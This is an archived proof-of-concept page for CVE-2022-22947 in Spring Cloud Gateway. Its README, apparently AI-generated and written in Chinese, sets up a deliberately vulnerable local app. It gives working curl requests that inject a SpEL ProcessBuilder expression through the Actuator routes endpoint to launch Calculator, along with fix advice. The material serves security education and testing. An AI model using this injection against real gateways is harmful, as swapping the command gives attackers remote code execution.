Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-22947 PoC — VMware Spring Cloud Gateway 代码注入漏洞

Source
https://github.com/skysliently/CVE-2022-22947-pb-ai
Associated Vulnerability
Title:VMware Spring Cloud Gateway 代码注入漏洞 (CVE-2022-22947)
Description:In spring cloud gateway versions prior to 3.1.1+ and 3.0.7+ , applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.
Description
一个由AI生成的漏洞验证应用
Readme
# CVE-2022-22947 Spring Cloud Gateway 漏洞验证应用

这是一个专门用于演示和验证 CVE-2022-22947 漏洞的 Spring Cloud Gateway 应用。该应用程序使用了易受攻击的 Spring Cloud Gateway 版本,可以通过 Actuator 端点执行任意代码。

## 漏洞概述

CVE-2022-22947 是 Spring Cloud Gateway 中的一个远程代码执行漏洞。攻击者可以通过 Actuator 端点动态添加包含恶意 SpEL 表达式的路由来执行任意代码。

## 环境要求

- Java 11+
- Maven 3.6+
- macOS 系统(用于计算器演示)

## 启动应用

```bash
mvn spring-boot:run
```

应用将在 `http://localhost:8080` 上启动。

## 漏洞验证步骤

### 第一步:添加恶意路由

发送 POST 请求到 `/actuator/gateway/routes/test` 端点,添加包含恶意 SpEL 表达式的路由:

```bash
curl -X POST http://localhost:8080/actuator/gateway/routes/test \
  -H "Content-Type: application/json" \
  -d '{
    "id": "test",
    "filters": [
      {
        "name": "AddResponseHeader",
        "args": {
          "name": "Result",
          "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
        }
      }
    ],
    "uri": "http://example.com",
    "predicates": [
      {
        "name": "Path",
        "args": {
          "_genkey_0": "/test"
        }
      }
    ]
  }'
```

### 第二步:刷新路由

发送 POST 请求到 `/actuator/gateway/refresh` 端点来刷新路由:

```bash
curl -X POST http://localhost:8080/actuator/gateway/refresh
```

### 第三步:触发恶意代码

访问恶意路由来触发代码执行:

```bash
curl http://localhost:8080/test
```

### 预期结果

成功利用漏洞后,macOS 计算器应用程序将会启动。

## 关键请求信息

### 1. 添加恶意路由的请求

**端点**: `POST /actuator/gateway/routes/test`

**请求头**:
```
Content-Type: application/json
```

**请求体**:
```json
{
  "id": "test",
  "filters": [
    {
      "name": "AddResponseHeader",
      "args": {
        "name": "Result",
        "value": "#{new java.lang.ProcessBuilder(\"open\", \"-a\", \"Calculator\").start()}"
      }
    }
  ],
  "uri": "http://example.com",
  "predicates": [
    {
      "name": "Path",
      "args": {
        "_genkey_0": "/test"
      }
    }
  ]
}
```

### 2. 刷新路由的请求

**端点**: `POST /actuator/gateway/refresh`

### 3. 触发漏洞的请求

**端点**: `GET /test`

## 漏洞分析

该漏洞允许攻击者通过 Actuator 端点动态添加路由,并在路由过滤器中使用 SpEL 表达式执行任意代码。漏洞的核心在于 Spring Cloud Gateway 对路由配置中的 SpEL 表达式处理不当。

## 修复建议

1. 升级到 Spring Cloud Gateway 3.1.1+ 或 3.0.7+
2. 禁用 Actuator 端点或限制访问
3. 使用 Spring Security 保护 Actuator 端点

## 版本信息

- Spring Boot: 2.6.2
- Spring Cloud: 2021.0.0
- Spring Cloud Gateway: 3.1.0 (易受攻击版本)

## 注意事项

⚠️ **安全警告**: 此应用仅用于教育和安全研究目的。请勿在生产环境中使用或部署此应用。

⚠️ **法律声明**: 使用此应用进行漏洞测试时,请确保您有适当的授权。未经授权的测试可能违反法律法规。
File Snapshot

 [4.0K]  /data/pocs/644d7350cfd8d0a42338748c0c7a0c9eed007f63
├── [2.0K]  pom.xml
├── [3.2K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  com
        │       └── [4.0K]  example
        │           └── [4.0K]  vulnerablegateway
        │               └── [ 354]  VulnerableGatewayApplication.java
        └── [4.0K]  resources
            └── [ 333]  application.yml

7 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →